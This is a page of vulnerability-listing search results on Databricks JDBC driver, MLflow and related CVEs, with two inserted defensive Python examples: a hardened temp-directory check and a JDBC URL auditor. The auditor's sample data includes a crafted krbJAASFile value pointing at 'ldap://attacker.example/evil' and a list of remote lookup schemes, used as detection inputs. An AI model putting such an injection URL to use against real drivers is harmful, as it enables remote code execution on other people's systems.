106 matches found
Microsoft Azure Databricks Access Control Error Vulnerability
Microsoft Azure Databricks is an open analytics platform from Microsoft Corporation, USA. An improper access control vulnerability exists in Microsoft Azure Databricks and could lead to elevation of privilege...
GHSA-J5PM-7495-QMR3 vulnerabilities
Vulnerabilities for packages: fulcio-fips, nri-redis, opentofu-fips, gatekeeper-fips, kubelet-csr-approver-fips, opentelemetry-collector, licenseclassifier, yace, kubernetes-dashboard-metrics-scraper, kubernetes, nri-memcached, sonobuoy-fips, flux-helm-controller-fips, cilium-fips, http-echo,...
CVE-2024-49194
Databricks JDBC Driver 2.x before 2.6.40 could potentially allow remote code execution (RCE) by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achiev...
Relative Path Traversal
Overview mlflow is a platform to streamline machine learning development, including tracking experiments, packaging code into reproducible runs, and sharing and deploying models. Affected versions of this package are vulnerable to Relative Path Traversal in the...
Privilege escalation from writing file into temporary directory to arbitrary code execution
Description The MLflow temporary directory gets assigned insecure world-writable permissions (0o777). def get_or_create_tmp_dir(): """ Get or create a temporary directory which will be removed once the python process exits. """ from mlflow.utils.databricks_utils import get_repl_id, is_in_databricks_runtime if...
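The report above describes a shared temporary directory forced to mode 0o777, which lets any local user plant or replace files that the MLflow process later reads or executes. The following is an added example, not MLflow's own code: it models the insecure pattern beside a hardened replacement built on `tempfile.mkdtemp()` (which creates a uniquely named 0o700 directory atomically), plus the ownership and permission check a loader should apply before trusting anything staged in such a directory. Directory names, the `safe_to_load_from` helper and `demo()` are assumptions for illustration.

```python
import os
import stat
import tempfile


def insecure_tmp_dir(parent):
    """Vulnerable pattern (modelled on the report, not MLflow's exact code):
    a fixed, shared directory under `parent`, then chmod'ed to 0o777 so any
    local user can add, replace or truncate files inside it."""
    path = os.path.join(parent, "repl_tmp_data")
    os.makedirs(path, exist_ok=True)
    os.chmod(path, 0o777)  # world-writable: this is the defect
    return path


def hardened_tmp_dir(parent):
    """Hardened replacement: mkdtemp picks an unpredictable name and creates the
    directory with mode 0o700 regardless of the process umask, in one step."""
    return tempfile.mkdtemp(prefix="repl_tmp_data-", dir=parent)


def is_world_writable(path):
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def safe_to_load_from(path):
    """Only trust a staging directory that we own and that no other user
    (group or world) can write to. A directory failing this check could have
    had its contents swapped by another local account."""
    st = os.stat(path)
    owned_by_us = st.st_uid == os.geteuid()
    others_can_write = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
    return owned_by_us and not others_can_write


def demo():
    """Create both variants under a fresh scratch parent and report what the
    permission checks see (hypothetical helper for this example)."""
    parent = tempfile.mkdtemp(prefix="mlflow-perm-demo-")
    bad = insecure_tmp_dir(parent)
    good = hardened_tmp_dir(parent)
    return {
        "insecure_world_writable": is_world_writable(bad),
        "insecure_trusted": safe_to_load_from(bad),
        "hardened_mode": os.stat(good).st_mode & 0o777,  # 0o700
        "hardened_trusted": safe_to_load_from(good),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {oct(value) if key == 'hardened_mode' else value}")
```

Run it as an unprivileged user on a POSIX host; the insecure directory shows up as world-writable and untrusted, the hardened one as 0o700 and trusted.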
acedeploy (>=2.4.15 <=2.4.115), arreyy (=0.0.1) +87 more potentially affected by CVE-2025-24794 via snowflake-connector-python (>=2.7.12 <=3.13.0)
snowflake-connector-python PYPI version =2.7.12, =2.4.15, =0.4.0, =0.1.3, =0.1.0, =1.13.21, =20230717.1.0, =0.4.0, =1.0.8, =1.0.5, =0.3.1, =1.1.4 - datacontract-cli =0.10.4 - dataligo =0.7.3 and more Source cves: CVE-2025-24794 Source advisory: OSV:PYSEC-2025-27...
A vulnerability in the Databricks JDBC driver, caused by insufficient sanitization of input data, allows attackers to execute arbitrary code.
The vulnerability in the Databricks JDBC driver is caused by insufficient sanitization of input data. Exploiting it allows a malicious actor to execute arbitrary code remotely...
Remote Code Execution (RCE)
com.databricks:databricks-jdbc is vulnerable to remote code execution (RCE). Insufficient validation or sanitization of the krbJAASFile parameter in the Databricks JDBC Driver allows an attacker to manipulate the JDBC URL, enabling a JNDI injection that can lead to...
Databricks JDBC Driver Command Injection vulnerability
Databricks JDBC Driver 2.x before 2.6.40 could potentially allow remote code execution (RCE) by triggering a JNDI injection via a JDBC URL parameter. The vulnerability is rooted in the improper handling of the krbJAASFile parameter. An attacker could potentially exploit this vulnerability to achiev...
io.kestra.plugin:plugin-databricks (>=0.11.0 <=0.17.0), org.finos.legend-community:legend-delta (>=0.1.5 <=0.1.10) +92 more potentially affected by CVE-2024-49194 via com.databricks:databricks-jdbc (>=2.6.25 <=2.6.40-patch-1)
com.databricks:databricks-jdbc MAVEN version =2.6.25, =0.11.0, =0.1.5, =0.0.8, =0.1.1, =4.55.0, =4.55.0, =3.6.1, =3.17.0, =4.7.1, =4.47.0, =4.47.0, =release-4.114.0 - org.finos.legend.engine:legend-engine-pure-runtime-java-extension-shared-function...
Databricks JDBC Driver Security Vulnerability
Databricks JDBC Driver is a driver from Databricks, Inc. A security vulnerability exists in Databricks JDBC Driver versions prior to 2.6.40 that stems from improper handling of the krbJAASFile parameter. An attacker can exploit the vulnerability to remotely execute code...
CVE-2024-49194
Databricks JDBC Driver 2.x (prior to 2.6.40) is affected by a JNDI injection vulnerability via the krbJAASFile parameter in a JDBC URL. The issue allows remote code execution in the driver context if a user connects using a crafted URL that includes the krbJAASFile property. Root cause is imprope...
PT-2024-10170 · Databricks · Databricks Jdbc Driver
Name of the Vulnerable Software and Affected Versions: Databricks JDBC Driver versions prior to 2.6.40 Description: The issue is related to the improper handling of the krbJAASFile parameter, allowing a remote attacker to execute arbitrary code by triggering a JNDI injection via a JDBC URL...
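The CVE-2024-49194 entries above all come down to one condition: a connection string that a user does not fully control carries a krbJAASFile property, and a 2.x driver older than 2.6.40 hands that value to JNDI. An added example, not code from Databricks or from any of the advisories, of the pre-connection check a service that accepts JDBC URLs from users or configuration could run: it parses the `;key=value` properties off a Databricks/Spark JDBC URL, flags krbJAASFile regardless of capitalisation, flags values that point at a remote lookup scheme, and compares the driver version against the range stated in the CVE text (2.x before 2.6.40). The sample URLs, the scheme list and the `audit_jdbc_url` verdicts are constructed for this example.

```python
# Constructed sample connection strings; hosts and tokens are placeholders.
SAMPLE_URLS = [
    "jdbc:databricks://adb-1234.azuredatabricks.net:443/default;transportMode=http;"
    "ssl=1;httpPath=/sql/1.0/warehouses/abc;AuthMech=3;UID=token;PWD=dapi...",
    "jdbc:databricks://host.example:443/default;AuthMech=1;KrbRealm=EXAMPLE.COM;"
    "krbJAASFile=ldap://attacker.example/evil;",
    "jdbc:spark://host.example:443/default;KRBJAASFILE=/etc/krb5/jaas.conf",
]

# Schemes that turn a "file" reference into a remote JNDI/URL fetch (assumed list).
REMOTE_SCHEMES = ("ldap://", "ldaps://", "rmi://", "dns://", "iiop://", "http://", "https://")


def parse_jdbc_properties(url):
    """Split the ';key=value' properties off a Databricks/Spark JDBC URL.
    Keys are lower-cased so the check catches any capitalisation of krbJAASFile."""
    _base, _, prop_string = url.partition(";")
    props = {}
    for segment in prop_string.split(";"):
        if not segment.strip():
            continue
        key, _, value = segment.partition("=")
        props[key.strip().lower()] = value.strip()
    return props


def parse_version(version):
    """'2.6.40-patch-1' -> (2, 6, 40); suffixes are dropped, short tuples padded."""
    core = version.split("-", 1)[0]
    parts = [int(p) for p in core.split(".") if p.isdigit()]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_vulnerable_version(version):
    """Range from the CVE-2024-49194 text: Databricks JDBC Driver 2.x before 2.6.40."""
    v = parse_version(version)
    return v[0] == 2 and v < (2, 6, 40)


def audit_jdbc_url(url, driver_version):
    """Return the facts a gate needs plus a verdict (hypothetical policy):
    reject when krbJAASFile points at a remote scheme or the driver is in the
    vulnerable range; send a local-path value on a fixed driver for review."""
    props = parse_jdbc_properties(url)
    value = props.get("krbjaasfile")
    remote = value is not None and value.lower().startswith(REMOTE_SCHEMES)
    result = {
        "has_krb_jaas_file": value is not None,
        "krb_jaas_file": value,
        "remote_scheme": remote,
        "vulnerable_version": is_vulnerable_version(driver_version),
    }
    if value is None:
        result["verdict"] = "allow"
    elif remote or result["vulnerable_version"]:
        result["verdict"] = "reject"
    else:
        result["verdict"] = "review"
    return result


if __name__ == "__main__":
    for sample in SAMPLE_URLS:
        for version in ("2.6.38", "2.6.40"):
            verdict = audit_jdbc_url(sample, version)["verdict"]
            print(f"driver {version}: {verdict:6s} {sample[:60]}...")
```

The version gate alone is not enough: even on a fixed driver, a krbJAASFile value that resolves to a remote scheme should never be accepted from an untrusted source, which is why the verdict keys on the value before the version.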
com.databricks.labs:automl-toolkit (=0.8.1), ml.combust.mleap:mleap-avro_2.12 (>=0.14.0 <=0.23.0) +14 more potentially affected by CVE-2023-5245 via ml.combust.mleap:mleap-runtime_2.12 (>=0.14.0 <=0.23.0)
ml.combust.mleap:mleap-runtime_2.12 MAVEN version =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.19.0, =0.14.0, =0.14.0, =0.14.0, =0.14.0, =0.19.0, =0.14.0, =0.17.0, =0.23.0 and more Source cves: CVE-2023-5245 Source advisory: OSV:GHSA-897X-XVJ8-42RQ...
Databricks Platform Cluster Isolation Bypass
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Bypassing cluster isolation through insecure defaults and shared storage product: Databricks Platform vulnerable version: PaaS version as of 2023-01-26 fixed version:...
Security Bulletin: IBM Workload Scheduler potentially affected by a vulnerability found in Json-smart library (CVE-2023-1370)
Summary IBM Workload Scheduler is potentially affected by a vulnerability found in the Json-smart library that can cause stack exhaustion (stack overflow) and a software crash. Specifically, the following plugins can suffer from this issue: Azure Storage Job Executor, Azure Resource Manager Job Executo...
Remote file existence check vulnerability in `mlflow server` and `mlflow ui` CLIs
Impact Users of the MLflow Open Source Project who host the MLflow Model Registry with the `mlflow server` or `mlflow ui` commands on an MLflow version older than 2.2.1 may be vulnerable to a remote file existence check exploit if they do not limit who can query their server for...